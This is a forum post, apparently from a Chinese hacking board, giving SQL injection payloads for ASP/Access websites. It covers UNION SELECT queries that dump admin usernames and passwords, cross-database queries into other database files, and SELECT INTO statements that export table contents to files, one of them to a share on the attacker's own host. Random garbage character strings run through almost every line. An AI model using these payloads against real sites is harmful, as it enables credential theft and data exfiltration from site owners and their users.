找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2211|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
--------------------------------------------------------------
4 e6 @( ]0 T0 ^) r! F2 Z0 junion查询法
$ s7 u3 k# d7 A% u3 [8 J首先要说的就是查询办法,一般的查询办法就是
4 |0 ]) j8 P* B$ [; s
8 V0 E" w) V- c& b程序代码
8 W. U. R# ^! ~; q' r: wand 1=(select count(*) from admin where left(id,1)='1')
) v& r: \1 g$ {+ v( g$ |* U% B4 y2 C2 \! x- o; m
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.6 Y. ?. ]# Q0 D# {/ F
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
0 n, w+ L9 N% K4 `+ w* O譬如你有一个ACCESS点:/ B0 v& m7 y# u9 w; d' n& {/ {
程序代码; s& U  c8 u' h) i- V
http://bbs.tian6.com/xiaoyang.asp?coder=1
, A$ a; r& D/ l8 Y) P) c" v. M
% e8 y& p" S& M& c8 H# Z知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
" q5 }: e! g& H& B2 m- z; |然后我们直接来:( \1 H$ c6 W5 y4 ]$ e0 u
程序代码" Y) Z+ j4 a) p
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]5 q2 Z9 a1 i- U( z4 j& [3 K
2 O  Z! Q/ W9 e; I, {
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.3 E# T9 x2 {1 W9 A

, u9 V& {# r/ U* f% U
" x8 A; V2 J% {7 N* |+ d8 c; J' z: d5 u2 `& ^: X8 r( W! G
---------------------------------------------------------------' }8 I) ]4 I" c  z* |
Access跨库查询
- r9 R9 I5 v7 y, \* T( m6 K有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的." A7 m. p! _0 J1 @
跨库的查询语句:7 S( A3 m. \' x$ J, d. Q
子查询:- Z! z- c5 t" B0 ?
程序代码
* ?1 j. U5 g0 i' n: V8 ^7 t5 sand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0$ T' Y9 O) }9 |. X8 D' E
6 j. q7 y( x; S$ U+ G' S1 d1 E/ H
union查询:
% ~" `+ ^1 j3 D) ~& T程序代码
: `7 F9 N& a' d  ~. a) eunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
1 l" J, ~! h0 P/ {! I
6 T, E/ M- G: D2 h+ f3 {8 y跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:& |# ^! j4 B( k! x. l
程序代码1 M9 T" D1 X9 l  A
http://www.4ngel.net/article/46.htm
0 q% O6 R# K) Z2 W* m( _5 J- s8 lhttp://hf110.com/Article/hack/rqsl/200502/66.html
& b9 \& r; N5 Y, I* S2 d) l
; @- l  b+ a( `, O8 N0 j/ p3 a; W/ ~---------------------------------------------------------------
% M2 N( V8 F6 s' c8 wAccess注入,导出txt,htm,html# {' \" x" t1 Z2 a6 R% g7 w
子查询语句:
$ n5 L* t' \+ a+ [% v+ S0 {程序代码/ o. M, Y) P) X. Z& o( }  `
Select * into [test.txt] in 'd:\web\' 'text;' from admin( B9 s& B! T/ t& ]5 E1 p# Z- \1 ^
0 ?9 Z- K/ K  o0 u+ j$ I. {- O1 _
这样就把admin表的内容以test类型存进了d:\web里面.
4 L+ [* V- Z; i7 u+ I/ V! EUNION查询:
* Y* J9 f: V/ Y程序代码& b8 B/ V! s0 N
union select * into [admin.txt] in 'c:\' 'test;' from admin! K  Q4 |( y) u& b/ Z) C

9 d- b9 @6 y# j0 }+ N而且这里也可以保存到本地来:# r5 @9 ^6 @( R
程序代码
8 y0 g8 O8 s# d( }+ P  t2 \" N- PSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
3 R8 _* @4 c  V
& o! M) A; J/ K; p' _. n2 b不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
! F$ b: z' c. G0 D9 q
5 n; Z3 Z5 g" f4 I/ [( \$ s" Y- g程序代码9 O7 [& {0 O; g' `- Y
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
. Z( K$ f2 t; K1 K% A  K( S0 O5 Q  i$ ]# R4 |
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.# P  [$ y! |" W; C! a. g0 c* W2 c5 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表